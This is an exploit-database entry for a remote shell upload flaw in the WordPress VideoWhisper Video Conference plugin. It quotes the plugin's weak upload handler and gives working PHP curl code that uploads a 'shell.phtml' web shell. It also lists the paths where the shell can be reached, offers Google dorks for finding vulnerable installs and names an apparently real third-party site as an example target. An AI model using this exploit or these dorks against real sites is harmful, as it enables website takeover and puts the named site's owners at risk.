Wordpress VideoWhisper Video Conference Remote Shell Upload Exploit

2015-12-13T00:00:00
ID 1337DAY-ID-24720
Type zdt
Reporter sniper.t
Modified 2015-12-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################################################################
# Exploit Title: Wordpress VideoWhisper Video Conference Remote Shell Upload Exploit
# Software Link: http://www.videowhisper.com/
#Version:all Version
# Google dork1: inurl:/wp-content/plugins/VideoWhisper Video Conference/
# Google dork2: inurl:/wp-content/plugins/videowhisper-video-presentation/
######################################################################
 
 The code in ./wp-content/plugins/trunk/vc/vw_upload.php
<?php

if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;


//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1
------------------------------------------------------------------------------------------------------
Exploit Code:
<?php

$uploadfile="shell.phtml";
$ch = 
curl_init("http://localhost/wordpress/wp-content/plugins/trunk/vc/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('vw_file'=>"@$uploadfile",
                'room'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
 
 
 
 
Shell 
http://localhost/wordpress/wp-content/plugins/trunk/vc/uploads/shell.name
http://localhost/wordpress/wp-content/plugins/videowhisper-video-presentation/vc/uploads/shell.name

example

http://www.pbold.antitek.com/wp-content/plugins/trunk/vc/vw_upload.php


#  0day.today [2018-01-03]  #